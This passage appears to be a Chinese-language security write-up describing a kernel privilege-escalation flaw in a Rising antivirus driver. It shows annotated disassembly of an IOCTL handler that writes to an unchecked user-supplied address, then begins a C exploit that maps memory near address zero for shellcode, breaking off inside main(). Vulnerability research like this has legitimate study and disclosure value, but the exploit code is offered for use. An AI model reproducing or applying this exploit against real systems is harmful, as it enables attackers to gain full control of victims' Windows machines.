近期在发现symtdi权限提升的漏洞的基础上，对瑞星的驱动程序也进行分析，发现也存在问题，由于驱动程序中处理 IRP_MJ_DEVICE_CONTROL例程没有检查用户传入的缓冲区地址的合法性，造成任意内核地址可写的漏洞,用户可以发送恶意的DeviceIoControl的来完全的控制计算机。请看以下汇编片段:; int __stdcall sub_10ABE(int,PIRP Irp).text:00010ABE sub_10ABE proc near ; DATA XREF: start+2Co.text:00010ABE.text:00010ABE Irp = dword ptr 0Ch.text:00010ABE.text:00010ABE push ebp.text:00010ABF mov ebp, esp.text:00010AC1 mov edx, [ebp+Irp].text:00010AC4 push ebx.text:00010AC5 push esi.text:00010AC6 push edi.text:00010AC7 mov edi, [edx+60h] ; 这里为了效率，依然使用METHOD_NEITHER这种方式进行数据传输 .text:00010ACA mov eax, 220023h.text:00010ACF mov ecx, [edi+0Ch].text:00010AD2 cmp ecx, eax.text:00010AD4 ja loc_10C09.text:00010AD4.text:00010ADA jz loc_10BFB.text:00010ADA.text:00010AE0 mov eax, ecx.text:00010AE2 sub eax, 220007h.text:00010AE7 jz loc_10B6D ;这里存在比较严重的问题....... loc_10B6D:; CODE XREF: sub_10ABE+29j.text:00010B6D mov ax, es.text:00010B70 mov word_1329C, ax.text:00010B76 mov ax, ds.text:00010B79 mov word_1329A, ax.text:00010B7F mov ecx, [edi+8] ; 长度.text:00010B82 mov esi, [edi+10h] ; esi = irpSp->Type3InputBuffer.text:00010B85 mov eax, ecx.text:00010B87 mov edi, offset unk_13080 ; 这里也没有检查输入的缓冲区的; 长度，可以对静态数据区进行溢;出, 不过你往下看你会更兴奋.text:00010B8C shr ecx, 2.text:00010B8F rep movsd.text:00010B91 mov ecx, eax.text:00010B93 mov eax, P.text:00010B98 xor ebx, ebx.text:00010B9A and ecx, 3.text:00010B9D cmp eax, ebx.text:00010B9F rep movsb.text:00010BA1 jz loc_10CA7.text:00010BA1.text:00010BA7 push eax ; Buffer.text:00010BA8 push offset unk_13099 ; FileHandle.text:00010BAD call sub_10414.text:00010BAD.text:00010BB2 test al, al.text:00010BB4 jnz short loc_10BC7.text:00010BB4.text:00010BB6 mov eax, [ebp+Irp].text:00010BB9 mov eax, [eax+3Ch] ; eax = irp->UserBuffer.text:00010BBC mov dword ptr [eax], 1 ; eax所指向的地址被写入了1.text:00010BC2 jmp loc_10CA7 到此我们已经看清楚了这个漏洞的成因，也看到了利用方法，和之前的symtdi的利用方法基本一样. #include#include #pragma comment (lib, "ntdll.lib") typedef LONG NTSTATUS; #define STATUS_SUCCESS ((NTSTATUS)0x00000000L)#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) typedef struct _IMAGE_FIXUP_ENTRY { WORD offset:12;WORD type:4;} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY; typedef struct _UNICODE_STRING { USHORT Length;USHORT MaximumLength;PWSTR Buffer;} UNICODE_STRING, *PUNICODE_STRING; extern "C"NTSTATUSNTAPINtAllocateVirtualMemory(IN HANDLE ProcessHandle,IN OUT PVOID *BaseAddress,IN ULONG ZeroBits,IN OUT PULONG AllocationSize,IN ULONG AllocationType,IN ULONG Protect); int main(int argc, char* argv[]){NTSTATUS status;HANDLE deviceHandle;DWORD dwReturnSize = 0;PVOID VdmControl = NULL;PVOID p = NULL; PVOID ShellCodeMemory = (PVOID)0x1;DWORD MemorySize = 0x1000; PROCESS_INFORMATION pi;STARTUPIN